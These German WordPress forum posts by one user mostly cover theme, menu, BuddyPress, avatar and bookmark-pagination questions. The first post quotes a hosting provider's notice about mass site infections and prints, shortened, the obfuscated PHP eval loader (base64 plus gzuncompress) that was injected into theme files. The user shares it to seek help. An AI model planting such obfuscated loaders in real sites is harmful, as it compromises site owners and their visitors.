Beiträge von bluecafe

    Strato schreibt dazu:

    Zitat

    Aufgrund der plötzlichen und massenhaft auftretenden Probleme mit WordPress-Installationen seit dem letzten Wochenende (23.10./24.10.2010) wurde durch unser Rechenzentrum eine Analyse der betroffenen Webseiten vorgenommen.

    Dabei haben die Kollegen festgestellt, dass durch eine scheinbar auch in der aktuellsten WordPress-Version existierende Sicherheitslücke in Verbindung mit der Datei "wp-admin/theme-editor.php" gleich reihenweise Webseiten mit Schadcode infiziert wurden. Dieser sorgt letztlich für die Verringerung des für WordPress zur Verfügung stehenden Speichers.

    Bei strato kann man Themes über den Theme editor bearbeiten.
    Bei all-inkl geht das nur, wenn man der Theme Datei die Schreibrechte 666 gibt. Gibt es dazu eine Servereinstellung, dass man das bei strato auch so einrichten kann, dass Themedateien erst dann beschreibbar sind, wenn man sie mit Schreibrechten versieht?

    Am 24.10. wurden bei einer wordpress Site folgende Zeilen an den Anfang der page.php und tag.php eingefügt (stark gekürzt ).

    PHP
    <?php $linedup = array("4_decode","base6"); $grep_ = array("gzunco","mpress") ; $stips = array('eNp1WWtv4','koS/Sv','3w0gzo1ztNTZ','kbF3lQ0jAQIAQQ4zt1WrlB2','DABm','cI+LHa/77','dp9ptk','pmVItNu96PqV','NWp6s76fAjft8fDH9Eq/PZl','+/0/','X/y7+58//','fLb169','/fg2+/vGPr+a','UP4+BQ7+h089DM8nclL+e7t','gwb8','mbRrna3N3','Vsxz+6','FYBdfGXcNDnP','wfX6f4M1E4ZaiMlUqeHesbg','WI90','8rvfNCMtP','nmHEW8','WvmmXvBGoxdl','TrV2oTn+GmzveVQ/3NLviv/','4BYv','PuUOXNTKv','X7hch/', 
    .... 
    /vAwHIlwu1G','eSQy','fvQ9s0joJ','Xrdq6H','JKMJ/zUaSj9r','L+gHTp56wsyU0O1qUv6PrA9','N/Ey','Nlk7HZR10','1sJj3X','hiS9MBWAobUX','nJ6I4nnhBbWhd6r8QMQE0H4','+YuH','whYuJpL2L','iOir3v','mhI9AcNndJbC','ZKcDm/NKOFKE4ZOntxEDE7y','kRIU','cXW7UrsP2','3kXmsb','QWn8fOo+87eY','iBeN2rLT5sLRnTDuGTqTO0K','n8f+','e1joVz8Dh','frNf47','ZndH0P7p2UHZ','rnsfnTjPr6x1qsLv4Y2bZlJ','gu5z','3D4bZ1flm','atDCX/','UitHEW6ikjyi','SYQOlkvSoufSth4xoZ0KPrm','Evst','HO20iCQR/','Tg6P71','GTob8V/+zb3r','5TQ+D9jg5yJ'); $black = $linedup[1].$linedup[0]; eval($blue($black(implode("", $stips))));  eval($blue($black(implode("", $white)))); ?>

    Die Seite wurde dadurch erstmal lahm gelegt (u.a. betrug das memory limit nur noch 16MB). Laut strato waren eine Reihe weiterer Wordpress Seiten betroffen.
    Hat jemand Infos dazu oder weiss, ob diese Sicherheitslücke nur bei Strato auftrat oder auch anderswo?
    Die Dateien hatten nur Schreibrechte für den Besitzer CHMOD 644)


    Wenn ich diesen anklicke wird der Menüpunkt leider nicht im Quellcode mit dem current_page_item versehen. Warum eigentlich nicht?
    Gibt es da eine Lösung?

    Vielen Dank.

    Ja, die Lösung ist einfach, man kommt nur nicht gleich drauf. Der Link muss hinten immer einen / haben
    wenn der Link ohne abschließenden "/" also als http://meinlink.de eingegeben wird, dann gibts keine current_page_item Klasse

    Wenn der custom link aber so eingegeben wird: http://meinllink.de/ (also mit abschließendem '/'), dann wird eine current_page_item Klasse erzeugt.

    Ich möchte meinen WP-Blog zur Anmeldung für Mitglieder nutzen.
    Nach der Freischaltung haben die Mitglieder dann Zugang zu Buddypress.

    WP 3.0 mit Multisites und Buddypress ist installiert.
    Es wird aber immer gleich Buddypress angezeigt.

    Was muss ich machen damit dies funktioniert?

    Ich würde dazu auf der Hauptseite buddypress deaktivieren und dann nach dem Anmelden mit einem redirect plugin den user auf eine Unterseite mit buddypress Funktion weiterleiten.

    P.S. sorry ... war unsinn, was ich geschrieben habe. buddypress kann ja nur netzwerkweit aktiviert werden. Vielleicht dort wo die buddypress-Leiste oben eingeblendet ist eine if-Abfrage rein machen

    HTML
    if(is_user_member_of_blog($user_id, $blog_id)

    Hallo,


    Ich will nur das neben jedem Kommentar ein Avatar erscheint.

    Wenn du wirklich KOMMENTARE meinst und nicht Artikel ... bei den Kommentaren ist doch schon standardmäßig eine Avatarfunktion mit dabei (jedenfalls bei den meisten Themes).

    Userfotos werden ja nur für registrierte Nutzer angelegt (oder müssen bei dir die Kommentatoren registriert sein?).

    Wenn Kommentierende bei gravatar.com ein Avatar hochladen, dann erscheint das in deinen Kommentaren automatisch, wenn du diese Funktion bei Einstellungen -> Diskussion aktivierst .

    Ansonsten ist die Avatar Funktionen für Kommentare in der comments.php.

    hallo, danke für die Antwort. Es soll fürs frontend sein. Das Plugin facebook-connect hat z.B. die Eigenschaft, dass bei allen Leuten, die sich mit facebook einloggen, um zu kommentieren, bei Klick auf den Namen ein Profil des Kommentierenden auftaucht, dass die von der jeweiligen Person abgegebenen Kommentare auflistet. Das würde ich gerne auch für nicht über facebook eingeloggte hinkriegen.

    Ja, du müsstest den Templatetag für das Datum aus deinem Template rausnehmen und stattdessen ein customs field für das Datum erstellen.

    Der Datumstag ist <?php the_time('l, F jS, Y') ?> (oder so ähnlich).

    Stattdessen muss dann ein customs field geschaffen werden. Das Customs field muss dann stattdessen im Template definiert werden: Using Custom Fields « WordPress Codex

    Ein schönes Plugin für diese Zwecke ist more-fields WordPress › More Fields « WordPress Plugins

    Hi riddim,
    du meinst, die funktion
    [COLOR=#000000][COLOR=#0000bb]<?php wp_list_bookmarks[/COLOR][COLOR=#007700]([/COLOR][COLOR=#dd0000]) ?>[/COLOR][/COLOR] überschreiben? Ehrlich gesagt wüßte ich jetzt nicht, wo und wie ich da ansetzen sollte. Ich habe versucht, mich auf deinem Link zurecht zu finden, aber ich weiss nicht einmal, welche Datei dafür zuständig ist. Kannst du mir da noch etwas auf die Sprünge helfen?

    Ich bin mittlerweile soweit, dass ich rausgefunden habe, dass der Parameter 'limit' in der Funktion
    [COLOR=#000000][COLOR=#0000bb]<?php wp_list_bookmarks[/COLOR][COLOR=#007700]([/COLOR][COLOR=#dd0000]) ?>[/COLOR][/COLOR]
    zwei Werte enthalten kann. Der erste entspricht in etwa der Bedeutung offset, d.h. wieviele Links am Anfang ausgelassen werden sollen und der zweite die Anzahl der Links, die gezeigt werden soll. Also

    PHP
    <?php wp_list_bookmarks('categorize=0&category=14&orderby=ID&order=DESC&limit=0,500&show_description=1&show_updated=1'); ?></ul> 
    <ul><?php wp_list_bookmarks('categorize=0&category=14&orderby=ID&order=DESC&limit=500,500&show_description=1&show_updated=1'); ?></ul> 
    <ul><?php wp_list_bookmarks('categorize=0&category=14&orderby=ID&order=DESC&limit=1000,500&show_description=1&show_updated=1'); ?></ul>

    hätte drei Linklisten zur Folge,
    1.: Link 0-500
    2.: Link 501 - 1000
    3.: Link 1001 - 1500

    Das ist zwar schon ein kleiner Schritt in die richtige Richtung, aber leider noch keine Lösung.
    Dies würde mir schon einmal soweit helfen, die Links in beliebig große Funktionen aufzuteilen. Aber wie soll man daraus einen Loop oder gar Seitenumbrüche erstellen? Hat da jemand vielleicht noch eine weiterführende Idee? Danke schonmal!

    Hallo liebe wordpress-Profis, ich stehe vor einem Problem, auf das ich noch keine Lösung gefunden habe. Wie kann ich eine Linkkategorie mit mehreren hundert Links so ausgeben, dass sie auf verschiedene Seiten aufgeteilt und druchgeblättert werden kann? Bei dem Template Tag

    PHP
    [COLOR=#000000][COLOR=#0000BB]<?php wp_list_bookmarks[/COLOR][COLOR=#007700]([/COLOR][COLOR=#DD0000]) ?>[/COLOR][/COLOR]

    konnte ich kein entsprechendes Argument finden. Ein geeignetes Plugin konnte ich auch noch nicht entdecken. Hat da jemand vielleicht einen guten Tip für mich? Bin für jede Idee dankbar!